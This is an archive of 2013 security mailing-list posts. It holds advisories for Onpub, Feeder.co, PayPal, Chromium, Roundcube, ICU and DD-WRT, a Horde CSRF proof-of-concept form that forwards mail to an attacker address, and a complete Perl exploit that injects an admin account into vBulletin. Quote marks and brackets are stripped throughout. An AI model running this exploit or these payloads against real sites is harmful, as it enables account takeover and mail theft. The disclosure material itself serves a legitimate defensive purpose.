Onpub CMS 1.4 1.5 - Multiple SQL Injection Vulnerabilities
Document Title: === Onpub CMS 1.4 1.5 - Multiple SQL Injection Vulnerabilities References (Source): http://www.vulnerability-lab.com/get_content.php?id=1120 Release Date: = 2013-10-26 Vulnerability Laboratory ID (VL-ID): 1120 Common Vulnerability Scoring System: 8.2 Product Service Introduction: === Onpub is a web content management system (CMS) designed for those with intermediate to advanced web development skills looking to quickly set up custom, dynamic websites that are quick to update and easy to maintain. All Onpub content is stored in a fast and reliable MySQL database backend. There are many ways to customize and extend Onpub`s default design and functionality via open-standard web development tools and techniques. Onpub is ideal for those with no desire to implement a CMS from scratch, but still need a custom, yet agile solution. Onpub tightly integrates many widely used third-party web apps and scripts in to one coherent system to build further upon. ( Copy of the Vendor Homepage: http://onpub.com/ ) Abstract Advisory Information: == The Vulnerability Laboratory Research Team discovered multiple remote web vulnerabilities in the Onpub v1.5 Content Management System web-application. Vulnerability Disclosure Timeline: == 2013-10-26:Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): Onpub Product: Onpub - Content Management System 1.4 Lite and 1.5 Exploitation Technique: === Remote Severity Level: === Critical Technical Details Description: 1.1 Multiple remote sql injection web vulnerabilities are detected in the official in the Onpub v1.4 and 1.5 Content Management System web-application. The vulnerability allows remote attackers to unauthorized inject own sql commands to compromise the web-application or the web-server dbms. The sql injection vulnerabilities are located in the `websiteID`,`imageID`,`keywords`,`orderBy`,`order` and `articleID` values of the index.php file. Remote attackers are able to inject own sql commands via GET method request to compromise the database management system or cms web-application. The inject can be done by usage of the manage path via GET method request or by usage of the articleID in the index.php file POST method request. The severity of the remote sql injection bugs is estimated as critical. Exploitation of the remote sql injection web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the remote sql injection bug results in database management system and cms or web-application compromise. Vulnerable Module(s): [+] Manage Vulnerable File(s): [+] index.php Vulnerable Parameter(s): [+] websiteID [+] imageID [+] keywords [+] orderBy [+] order [+] articleID 2.1 A client-side post inject web vulnerability is detected in the official in the Onpub v1.4 and v1.5 Content Management System web-application. The vulnerability allows remote attackers to manipulate via POST method web-application to browser requests (client-side). The client-side cross site scripting web vulnerability is located in the vulnerable `page` parameter of the index.php file (manage module). Remote attackers can manipulate the `page` parameter in the `index.php` file via GET method request to compromise client-side application context. Successful exploitation of the client-side cross site scripting web vulnerability results in session hijacking, client-side phishing, client-side unauthorized external redirects and client-side manipulation of the contact formular module context. Vulnerable Module(s): [+] Manage Vulnerable File(s): [+] index.php Vulnerable Parameter(s): [+] page Proof of Concept (PoC): === 1.1 The sql injection web vulnerabilities can be exploited by remote attackers without privileged application user account and user interaction. For demonstration or to reproduce ... PoC: http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditWebsitewebsiteID=-1%27[SQL-INJECTION VULNERABILITY!] http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditArticlesfullTextSearch=1keywords=-1%27[SQL-INJECTION VULNERABILITY!] http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditWebsitesorderBy=-1%27[SQL-INJECTION
Feeder.co RSS Feeder 5.2 Chrome - Persistent Software Vulnerability
Document Title: === Feeder.co RSS Feeder 5.2 Chrome - Persistent Software Vulnerability Release Date: = 2013-10-26 Vulnerability Laboratory ID (VL-ID): 1119 Common Vulnerability Scoring System: 3.8 Product Service Introduction: === Feeder.co (www.feeder.co) is the simplest and prettiest way to follow your favorite feeds and sites. Feeder supports most RSS and Atom feeds on the web. Get a simple overview of your RSS and Atom feeds in the toolbar. A simple and pretty way of keeping track of your latest RSS and Atom feeds. The best RSS Feed Reader extension for Chrome. - Instantaneously see when new posts are added to one of your RSS and Atom feeds - Easily subscribe to new RSS/Atom feeds by clicking the browser icon - Intuitively manage your feeds - Right click context-menus in popup-menu let you mark all as read, and other nifty shortcuts - Export your feeds so you can import them on another computer and/or keep them as backups for safekeeping - Customize your feeds by choosing how many posts to display, or changing the title - Organize your feeds using folders and sorting with drag and drop - Choose between three different themes: Dark, Mint or Light - Everything is contained within the browser so no other third-party sites are needed - Notifications when feeds have been updated. Enable globally or on select feeds - Supports both RSS and Atom feeds - See when a page has any RSS or Atom feeds to subscribe to (Copy of the Vendor Product Homepage: http://feeder.co ) Abstract Advisory Information: == The Vulnerability Laboratory Research Team discovered a persistent web vulnerability in the Feeder.co RSS Feeds Chrome Addon. Vulnerability Disclosure Timeline: == 2013-10-26: Researcher Notification Coordination (Ateeq Khan) Discovery Status: = Published Affected Product(s): Feeder.co Product: RSS Feeder - Chrome Browser Addon 5.2 Exploitation Technique: === Remote Severity Level: === Medium Technical Details Description: A remote script code execution vulnerability has been detected in the official feeder.co RSS browser extension application. The vulnerability allows remote attackers to manipulate via POST method web-application to browser requests (persistent). The vulnerability affects the main feed input field and since the application is not performing input sanatization properly, it is possible to inject persistent script code within the affected folder name input field which then directly gets executed when the victim tries to delete the malicious entry. It is possible to inject malicious script code in the folder `Name` field parameter of the feeds while adding a new entry. The code execution happens when a user tries to delete the injected entries. the affected sourcecode with injected payload is given below for your reference: div class=``pui-confirm-text``Delete ``iframe onload=``prompt(2)`` src=``http://evolution-sec.com``script?/iframe/div It is also possible to inject malicious code through remote URL simply by adding new RSS feeds from a third party remote website. In this case, the ``Title`` parameter is vulnerable. It is also possible to import/export the RSS feeds through a file which makes this attack vector remotely exploitable through this method as well. This vulnerability affects all current feeder.co users who are using the RSS browser extension application for PC. iOS and Android users may also be affected with this vulnerability. Successful exploitation of the persistent cross site scripting web vulnerability results in persistent client-side phishing, persistent client-side unauthorized external redirects and persistent manipulation of the module context. Vulnerable Module(s): [+] RSS Feeds Vulnerable Sections(s): [+] Add Feed (Title parameter) [+] Add Folder Name (Name parameter) Proof of Concept (PoC): === The persistent script code execution vulnerability can be exploited by remote attackers without required web-application user account and with medium user interaction. For demonstration or to reproduce ... To reproduce the proof of concept, the researcher used multiple ways including importing feeds from a remote URL and adding payloads manually. Including payloads from remote URL: 1. Add a new feed entry in the browser extension with the following POC URL https://groups.google.com/forum/feed/evosec/msgs/rss.xml?num=15 2. You should now see the injected entries in your feeds. 3. Try to delete the newly included entry feed 4. You should see the code being
Paypal Inc Bug Bounty #104 - Persistent Exception Vulnerability
Document Title: === Paypal Inc Bug Bounty #104 - Persistent Exception Vulnerability References (Source): http://www.vulnerability-lab.com/get_content.php?id=1038 PayPal Security UID: gJ1127yy Release Date: = 2013-10-26 Vulnerability Laboratory ID (VL-ID): 1038 Common Vulnerability Scoring System: 4.3 Product Service Introduction: === PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account. PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank. On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010. Between December 4ñ9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation for PayPal s decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables. (Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal] Abstract Advisory Information: == The Vulnerability Laboratory Research Team discovered a persistent input validation vulnerability in the official PayPal Inc (Core API) Shipping Application. Vulnerability Disclosure Timeline: == 2013-07-31: Researcher Notification Coordination (Benjamin Kunz Mejri) 2013-08-01: Vendor Notification (PayPal Site Security Team - Bug Bounty Program) 2013-09-26: Vendor Response/Feedback (PayPal Site Security Team - Bug Bounty Program) 2013-10-25: Vendor Fix/Patch (PayPal Site Developer Team) 2013-10-26: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): PayPal Inc Product: Shipping MOS Application - API 2013 Q2 Exploitation Technique: === Remote Severity Level: === Medium Technical Details Description: A persistent input validation web vulnerability is detected in the official PayPal Inc (Core API) Shipping Web Application. The vulnerability allows remote attacker to inject own malicious script codes to the application-side with persistent attack vector. The vulnerability is located in the service unavailable exception of the Get Started with paypal module. Remote attackers can request the Get Started service with an
[SECURITY] [DSA 2785-1] chromium-browser security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2785-1 secur...@debian.org http://www.debian.org/security/ Michael Gilbert October 26, 2013 http://www.debian.org/security/faq - - Package: chromium-browser Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2013-2906 CVE-2013-2907 CVE-2013-2908 CVE-2013-2909 CVE-2013-2910 CVE-2013-2911 CVE-2013-2912 CVE-2013-2913 CVE-2013-2915 CVE-2013-2916 CVE-2013-2917 CVE-2013-2918 CVE-2013-2919 CVE-2013-2920 CVE-2013-2921 CVE-2013-2922 CVE-2013-2923 CVE-2013-2924 CVE-2013-2925 CVE-2013-2926 CVE-2013-2927 CVE-2013-2928 Several vulnerabilities have been discovered in the chromium web browser. CVE-2013-2906 Atte Kettunen of OUSPG discovered race conditions in Web Audio. CVE-2013-2907 Boris Zbarsky discovered an out-of-bounds read in window.prototype. CVE-2013-2908 Chamal de Silva discovered an address bar spoofing issue. CVE-2013-2909 Atte Kuttenen of OUSPG discovered a use-after-free issue in inline-block. CVE-2013-2910 Byoungyoung Lee of the Georgia Tech Information Security Center discovered a use-after-free issue in Web Audio. CVE-2013-2911 Atte Kettunen of OUSPG discovered a use-after-free in Blink's XSLT handling. CVE-2013-2912 Chamal de Silva and 41.w4r10r(at)garage4hackers.com discovered a use-after-free issue in the Pepper Plug-in API. CVE-2013-2913 cloudfuzzer discovered a use-after-free issue in Blink's XML document parsing. CVE-2013-2915 Wander Groeneveld discovered an address bar spoofing issue. CVE-2013-2916 Masato Kinugawa discovered an address bar spoofing issue. CVE-2013-2917 Byoungyoung Lee and Tielei Wang discovered an out-of-bounds read issue in Web Audio. CVE-2013-2918 Byoungyoung Lee discoverd an out-of-bounds read in Blink's DOM implementation. CVE-2013-2919 Adam Haile of Concrete Data discovered a memory corruption issue in the V8 javascript library. CVE-2013-2920 Atte Kuttunen of OUSPG discovered an out-of-bounds read in URL host resolving. CVE-2013-2921 Byoungyoung Lee and Tielei Wang discovered a use-after-free issue in resource loading. CVE-2013-2922 Jon Butler discovered a use-after-free issue in Blink's HTML template element implementation. CVE-2013-2924 A use-after-free issue was discovered in the International Components for Unicode (ICU) library. CVE-2013-2925 Atte Kettunen of OUSPG discover a use-after-free issue in Blink's XML HTTP request implementation. CVE-2013-2926 cloudfuzzer discovered a use-after-free issue in the list indenting implementation. CVE-2013-2927 cloudfuzzer discovered a use-after-free issue in the HTML form submission implementation. CVE-2013-2923 and CVE-2013-2928 The chrome 30 development team found various issues from internal fuzzing, audits, and other studies. For the stable distribution (wheezy), these problems have been fixed in version 30.0.1599.101-1~deb7u1. For the testing distribution (jessie), these problems will be fixed soon. For the unstable distribution (sid), these problems have been fixed in version 30.0.1599.101-1. We recommend that you upgrade your chromium-browser packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.15 (GNU/Linux) iQQcBAEBCgAGBQJSWwMrAAoJELjWss0C1vRzix8f/3u/oOLmR1/70gZliS/mbGYh MKCxR0BgS85CENIYujIlW1k+urYEnfjZkpDqzh41ExpgCos6NcncNtoP3apz2UDX 6g/qh/cbUC7eXUfXW/Z2/XFam9RtNoa9helhpuZ5RvyZ+A836CkEzCwigFOpgOMJ e/sPjgxwSpz3nlYR3VPG6dRMSOx0jFeickNZTHPm3DmuhmF3dvnKWKlmTvJ1LtC9 /GFHmdGckoVEVNMHD5v8FAlCwoRNAZ/WK/7h4Ro9/mc8Z9qJYB/7dUveiIAO73Qj JiOxI1hHjcCtsm3lUBmKe5/WDcTWeLz5IRTLfOMrxp0zZfYp858y2/tDDnqeNFn2 EVaKMsOZytVpF4ercGoszruDiKdnX8Uq6Ng44SssQf37FNDUOo9nrBghLyWnl8Kz 07MxAHzz4N8uy2UyjVTmzIYSP0s9ccRH6KgPxTfbWBdyb8Q/inKEU/7/XbBHKZSm Cqfh5jqIMcIuupg8wT20up4FvtcWSHrw2JmZxEQEsBn/wbNF+b67VNniUDFWgua7 LUmCmhJeZv+Zhjc4cHVliI5cGP03m4C/25dUplR9rofZ8VEG0vkPj6J3nyaEnCiS NY6Z3AfmntvRS50Vbrl+6v0BLjSjXeWPt2nRneQ+bEaCM8PX7wIPYBCczVxzzZrH 6nw7ngqrOCmwiuz0+2O777wmanWCAFimpaVwGNBqNxdfcywk16unIA+YU2AbHLeq anevGnQBbjyi9joO9gN67CCIBBVqmZ93DQHIUyjPNpuixtz9gzkunVdt9r+8OM3l Nom/ttW6foZ9NlLbg5tbYHtTrpZ/t8ng6it4AHmGM/QqGQmXZdYanNZ03ok3IFE7 lJNKGZb/TgwQms3dd3hXheOx8D3p8MclSyo81iaF5KAhsZ6bRVHM/u8hKtFZ8FIL nF3ppA0Y/HUZS1W9UweOJT0Vlxt8PNHn8YTHEhYUXX/HX5uDIdVVS4XSWCTxVYlu
[SECURITY] [DSA 2787-1] roundcube security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2787-1 secur...@debian.org http://www.debian.org/security/ Salvatore Bonaccorso October 27, 2013 http://www.debian.org/security/faq - - Package: roundcube Vulnerability : design error Problem type : remote Debian-specific: no CVE ID : CVE-2013-6172 Debian Bug : 727668 It was discovered that roundcube, a skinnable AJAX based webmail solution for IMAP servers, does not properly sanitize the _session parameter in steps/utils/save_pref.inc during saving preferences. The vulnerability can be exploited to overwrite configuration settings and subsequently allowing random file access, manipulated SQL queries and even code execution. roundcube in the oldstable distribution (squeeze) is not affected by this problem. For the stable distribution (wheezy), this problem has been fixed in version 0.7.2-9+deb7u1. For the unstable distribution (sid), this problem will be fixed soon. We recommend that you upgrade your roundcube packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.15 (GNU/Linux) iQIcBAEBCgAGBQJSbNQmAAoJEAVMuPMTQ89E6zYP/0tlZhlEgadu7xvTauny/zim RV2WCJFLmRMCGZYhCiOJ2ND50fAnn62CdO+vnWN3JH5FH0KIngLmtGfrq+EPjLwj rFPGMPKRDZRag8oV3SeKbsHlrcMHS5H/B9GhILst3+32pbwoBE7aH5+wTMYHshsF TK0whlv73RZge6njPfzqvdkSoIgCLYx4Mc+pXP/pC+wOaSiD/gMjKBh51DoOwpnB r7rfs7wmy4Ke1Ljsw35LceX64kCP8YC9d7FUPZc8SxUKEk3eojrhnSzpDUBt+Pvl /S8nAbCbbrosh464szwXL4w6gcZIDDJgvy3u3aTn+XvRCoK6cr8RrdMbBQibR1Xb 9hCdieOs0pkNbBI4yE6bivztAolHlfAwvsgFPcMv3fM26gAsSOC8SRrzRqQrqqqk 1jfUqJETE+W0FkjmZa4W6JiDm78ZP4DNFQCrITRaealMgo2dh2uKua/4PmaBwjJ/ /lrukur5D6mCcLxFEpRA9TwDYVcvWE3cCVL9WhaMBNRJWiuKuaamOujO7jPtzga8 uJZWGKQNTd4rB6WHN4uN2wqltPH3lOIxvOd+2Uu9P9mDwQkgfrQ0s/hwjB3dpPWO vNqHSeK2j8RZPDD4reulRFC4vEbI3MCXOUcyc+JqgI9Pa61Y0qrM6PwWyoPTDROr PGySE+o+FGBjlugiGG51 =CNJm -END PGP SIGNATURE-
Call for Papers, 2014 Symposium on Cryptography and Authentication (SCA2014) , Suzhou, China
This message was sent to [bugtraq@securityfocus.com]. Unsubscribe If you cannot read it, please click here. Call for Papers 2014 Symposium on Cryptography and Authentication (SCA2014) Submission Due: Nov. 27, 2013 Conference: March 10-12, 2014 Dear Colleagues, We would like to cordially invite you to submit or recommend papers to 2014 Symposium on Cryptography and Authentication (SCA2014)! This conference will be held from March 10 to 12, 2014 in Suzhou, China. The conference will bring together leading researchers, engineers and scientists in the domain of interest from around the world. More detailed information can be found at www.engii.org/workshop/CIS2014March. Related Topics (more can be found in our website) • Anti-Virus and Anti-Worms • Key Management and Key Recovery • Database Security • Language-based Security • Distributed Systems Security • Security Evaluation • Electronic Commerce Security • Security for Mobile Computing • Fraud Control • Security Models • Information Security Engineering • System Security • Information Privacy • Signature and Key Agreement Protocol Technical Program Committee Prof. Fagen Li, University of Electronic Science and Technology of China Prof. Xiaochun Cheng, Middlesex University Prof. Vic Grout, Glyndwr University Prof. Giannis F. Marias, Athens University of Economics and Business Prof. Stavros D. Nikolopoulos, University of Ioannina More Publication and Presentation All the accepted papers will be published by Journal of Computer and Communications (ISSN:2327-5219), a peer-reviewed open access journal that can ensure the widest dissemination of your published work. If you want to present your research results but do NOT wish to publish a paper, you may simply submit an Abstract to our Registration System. Yours sincerely, SCA Organizing Committee Email: c...@engii.org Tel : +86- 132 6470 2230
[CVE-2012-6297] DD-WRT v24-sp2 Command Injection
Unfortunately command injections like the NETGEAR one Zachary Cutlip and I both came across are all too common in embedded systems. Similar to NETGEAR and Linksys having commands injected when running ping, I have also noticed that DD-WRT v24-sp2 is prone to command injection from specially crafted configuration values containing shell meta-characters. A remote attacker can potentially use CSRF from an authenticated client to remotely execute commands on the router as the root user. This is also an easy way to DoS a system since you could potentially force it into a reboot loop. I reported this in the projects bug tracker almost a year ago but it doesn't look like this is actively maintained so I figured I may as well share with the list now in case anyone is running this firmware. This is tracked as CVE-2012-6297. There are a lot of consumer routers with these types of issues (working with several vendors on this stuff at the moment) so I have provided this list of generic tips for keeping consumer/SOHO routers secure: http://www.tripwire.com/state-of-security/vulnerability-management/five-tips-securing-soho-routers/ I would also love to hear what other suggestions people have towards minimizing the risk of someone popping a shell on your router. Regards, Craig http://secur3.us/pub_key.asc
Call for Papers, 2014 Symposium on Protocols and Rules for Security (SPRS2014)
This message was sent to [bugtraq@securityfocus.com]. Unsubscribe If you cannot read it, please click here. 2014 Symposium on Protocols and Rules for Security (SPRS2014) Call for Papers Dear Colleagues, We would like to cordially invite you to submit or recommend papers to 2014 Symposium on Protocols and Rules for Security (SPRS2014)! This conference will be held from March 10 to 12, 2014 in Suzhou, China. The conference will bring together leading researchers, engineers and scientists in the domain of interest from around the world. More detailed information can be found at www.engii.org/workshop/CIS2014March. Topics • Access Control • Anti-Virus and Anti-Worms • Authentication and Authorization • Biometric Security • Cryptography • Data and System Integrity • Database Security • Distributed Systems Security • Electronic Commerce Security • Intrusion Detection • Key Management and Key Recovery • Language-based Security • Network Security • Operating System Security • Risk Evaluation and Security Certification • Security Evaluation • Security for Mobile Computing Important Dates Submission Due: Nov. 27, 2013 Conference: March 10-12, 2014 Technical Program Committee Prof. Fagen Li, University of Electronic Science and Technology of China Prof. Xiaochun Cheng, Middlesex University Prof. Vic Grout, Glyndwr University Prof. Giannis F. Marias, Athens University of Economics and Business Prof. Stavros D. Nikolopoulos, University of Ioannina More Publication and PresentationAll the accepted papers will be published by Journal of Computer and Communications (ISSN:2327-5219), a peer-reviewed open access journal that can ensure the widest dissemination of your published work. To be considered for an oral presentation, you can also submit your abstract to our submission system. Contact Us Email: c...@engii.org Tel : +86- 132 6470 2230
[SECURITY] [DSA 2786-1] icu security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2786-1 secur...@debian.org http://www.debian.org/security/ Michael Gilbert October 27, 2013 http://www.debian.org/security/faq - - Package: icu Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2013-0900 CVE-2013-2924 Debian Bug : 702346 726477 The Google Chrome Security Team discovered two issues (a race condition and a use-after-free issue) in the International Components for Unicode (ICU) library. For the oldstable distribution (squeeze), these problems have been fixed in version 4.4.1-8+squeeze2. For the stable distribution (wheezy), which is only affected by CVE-2013-2924, this problem has been fixed in version 4.8.1.1-12+deb7u1. For the testing distribution (jessie), which is only affected by CVE-2013-2924, this problem will be fixed soon. For the unstable distribution (sid), which is only affected by CVE-2013-2924, this problem has been fixed in version 4.8.1.1-13+nmu1. We recommend that you upgrade your icu packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.15 (GNU/Linux) iQQcBAEBCgAGBQJSbYO5AAoJELjWss0C1vRzCO0f/2f0LJGu/BNl9fTFUAcG75j+ MmY927JqeOgQxbglH5CK/Rj8m+FCKE9D9Ak8ac4odA3R6AlIja4sQWHuiXJFTxP8 ZEJSmfrSS/dcolts3rBRxQOomQcIy6HrcXllmSn5q6GHjOkyykjRXGkVlfpcU98X hBrCu4dzgzgIglUC61Esmfd3qiw7R7ZVik+obKniRTgDkxX+piAaTsQpGGKoRoA2 NDwbHil2iIcpQ7o/HYrhxTPLDzgrN0/wsSJpCEYVlIp+WwSk3ZZOqB8/P+lL7lpx xDhq9HVxyicQsisrNZMSU7lq5GEtHzN5krVEfCCmbjLsosuJWwu7vgS2Dbpm91Z+ AtpTjBSwj1r85+lKy5vsYbETrX6N9EAWV8Pav+NbBzLGCofWdVlFw3aQM49I7geq ADuV00toYV/XLeEWd/Foz5FuxHU9TKX/gkMkNkqpGCcXQ58PMnKOJMRV6SEB8Sem sipq9CIbxi60dKQCgn+TkvRfULHNAhlzR4V0MG8Xr4ev26pvWQgoWDAA/kVg6AUr 64Cb+t5mHWllj93/+C34sAnRosNUJBRBTwuW4azL5fczh1YW4FiJ8SZPh8mOG+iA VoYrQhv/+tUdb5cYtog4QXMLLV0Ai6SM5OioGdZSLSLaMw2Y4mdD3S4WiPZmOZEY ITihdQzTX1VlqO8nYpE/zTcb9z4CIaFyoENLUe0G6F6aNGYcRsS0ZdX+IFY/KsBC s2eHaVnF1Vv2CWmi9ml9svunnf4szCbJ8VBsoMhahsfTntuo6pbeVj66I3CUGYuY Buc6Eoygzsl4MeD0fmYOMEAmMLvcA0Ehp/PJxyXFd/dJoV46cNuWz7HaqNH/5qa6 hDjhUb1SnmuFbh7FuLhr6EhujJiSy9SNVfMGojnThpH2sEFa66PAW+gXi3BkfwV7 jFU52Mc0fIL+ZHsvkWEXuz7Ha5NfCYmG50p9esyKMlAPXJ7EVwfBy02Dqzvyyy1n g+wAtLtvo7oicjTDsuJ7sGuQGzJaME0zt26Q0OVHA+lJnh/KzcWO2LFoYk/Fpv3N sjGwi/ge7hJiqcXvzbYGRgTlb6E0z/1e85DePrkha/a8zUCdJFDm8SqRfssqvdE5 QKnM63XvoDdIjO958yQa614D1UQ4f4ey0/iKdXa/NwbackMgPKBCllzkU/B5tVc/ LDeIGK5d355nWCBLt2AZ+V7N+taaKHdjmtpPStdT65QRKuXt2xIIJzJ4jWBc+p0F Vnh9lqBJDmHd6R3zTQKas25rCQyoB1Lfv74ANouAK1prgfdeEzVawmE+W1h6l6P1 OVAj7tjOrNq0xEli+B2iFMJG/6Q7VC8siCBQdHZYqWfMS21QIQj11PEcQHP7HFA= =WhFc -END PGP SIGNATURE-
Multiple CSRF Horde Groupware Web mail Edition 5.1.2
# Exploit Title : Multiple CSRF Horde Groupware Web mail Edition Author:Marcela Benetrix Date: 10/25/13 version: 5.1.2 software link:http://www.horde.org/apps/webmail # GroupWare Web mail Edition Horde Groupware Webmail Edition is a free, enterprise ready, browser based communication suite. Users can read, send and organize email messages and manage and share calendars, contacts, tasks, notes, files, and bookmarks with the standards compliant components from the Horde Project ## CSRF Location Several functionalities from Rules section were found to miss the token so as to prevent CSRF ## POC A body form action=./horde/ingo/basic.php?page=rule method=POST input type=hidden name=actionID value=rule#95;save / input type=hidden name=conditionnumber value=#45;1 / input type=hidden name=name value=TestingCSRF / input type=hidden name=combine value=1 / input type=hidden name=field#91;0#93; value=From / input type=hidden name=match#91;0#93; value=contains / input type=hidden name=value#91;0#93; value=test@hotmail#46;com / input type=hidden name=field#91;1#93; value= / input type=hidden name=action value=4 / input type=hidden name=actionvalue value=attacker#64;hotmail#46;com / input type=hidden name=stop value=1 / input type=submit value=Submit request / /form /body /html These were found at: * Creating a rule * Updating * Enabling (http://www.test.com/horde/ingo/basic.php?page=filtersrulenumber=2actionID=rule_enable) * Deleting ( url-based https://www.test.com/horde/ingo/basic.php?page=filtersrulenumber=6actionID=rule_delete) ### CVE identifier CVE-2013-6275. ## Vendor Notification 10/25/2013 to: the developers. They replied immediately and fixed the problem launching a patch: http://bugs.horde.org/ticket/12796 10/28/2013: Disclosure
vBulletin remote admin injection exploit
#!/usr/bin/perl # # Title: vBulletin remote admin injection exploit # Author: Simo Ben youssef # Contact: Simo_at_Morxploit_com # Coded: 17 September 2013 # Published: 24 October 2013 # MorXploit Research # http://www.MorXploit.com # # Vendor: vBulletin (www.vbulletin.com) # Version: 4.1.x / 5.x.x # Vulnerability: Remote admin injection # Severity: High # Status: Confirmed # # Exploit code description: # Perl code to inject a new admin account through upgrade.php script. # # Vulnerability details: # upgrade.php is vulnerable to a new admin account injection, the script doesn't require autentication when upgrading # it only requires the customer number which can be extracted through the same script source code. # # Fix: # Rename or delete the install folder until a fix is released. # # Author disclaimer: # The information contained in this entire document is for educational, demonstration and testing purposes only. # Author cannot be held responsible for any malicious use. Use at your own risk. # # Exploit usage: # # root@MorXploit:/home/simo/morx# perl morxvb.pl localhost # # === # --- vbulletin admin injection exploit # --- By: Simo Ben youssef simo_at_morxploit_com # --- MorXploit Research www.MorXploit.com # === # [*] Trying to get customer number ... hold on! # [+] Got ! # [*] Trying to MorXploit localhost ... hold on! # [+] Admin account successfully injected! # [+] Admin: MorXploit # [+] Pass: m0rxpl017 use strict; use IO::Socket; if(!defined($ARGV[0])) { system ('clear'); print \n; print ===\n; print --- vbulletin admin injection exploit\n; print --- By: Simo Ben youssef simo_at_morxploit_com\n; print --- MorXploit Research www.MorXploit.com\n; print ===\n; print --- Usage: perl $0 target\n\n; exit; } my $site = $ARGV[0]; # Change these as needed # my $user = MorXploit; my $passwd = m0rxpl017; my $email = dev%40null.com; my $path = /install/upgrade.php; ## my $accept = Accept: */*; my $ct = application/x-www-form-urlencoded; my $port = 80; system ('clear'); print \n; print ===\n; print --- vbulletin admin injection exploit\n; print --- By: Simo Ben youssef simo_at_morxploit_com\n; print --- MorXploit Research www.MorXploit.com\n; print ===\n; my $sock = new IO::Socket::INET ( PeerAddr = $site,PeerPort = $port,Proto = tcp); die \n[-] Can't creat socket: $!\n unless $sock; print [*] Trying to get customer number ... hold on!\n; print $sock GET $path HTTP/1.1\n; print $sock Host: $site\n; print $sock $accept\n; print $sock Content-Type: $ct\n; print $sock Connection: Close\n\n; my $gotcn; while(my $cn = $sock) { if ($cn =~ /CUSTNUMBER = \(.*?)\/){ $gotcn = $1; } } if (!defined $gotcn) { print [-] Failed to get customer number! Nulled? Going to try anyway!\n; } else { print [+] Got $gotcn!\n; } my $xploit = ajax=1version=installchecktable=falsefirstrun=falsestep=7startat=0only=falsecustomerid=$gotcnoptions[skiptemplatemerge]=0response=yeshtmlsubmit=1htmldata[username]=$userhtmldata[password]=$passwdhtmldata[confirmpassword]=$passwdhtmldata[email]=$email; my $cl = length($xploit); my $content = Content-Length: $cl; my $sock2 = new IO::Socket::INET ( PeerAddr = $site,PeerPort = $port,Proto = tcp); die \n[-] Can't creat socket: $!\n unless $sock; print [*] Trying to MorXploit $site ... hold on!\n; print $sock2 POST $path HTTP/1.1\n; print $sock2 Host: $site\n; print $sock2 $accept\n; print $sock2 Cookie: bbcustomerid=$gotcn\n; print $sock2 Content-Length: $cl\n; print $sock2 Content-Type: $ct\n; print $sock2 Connection: Close\n\n; print $sock2 $xploit\n\n; while(my $result = $sock2){ if ($result =~ /Administrator account created/) { print [+] Admin account successfully injected!\n; print [+] Admin: $user\n; print [+] Pass: $passwd\n; exit; } } print [-] Failed, something went wrong\n; exit;
[ISecAuditors Security Advisories] XSS vulnerability in LinkedIn
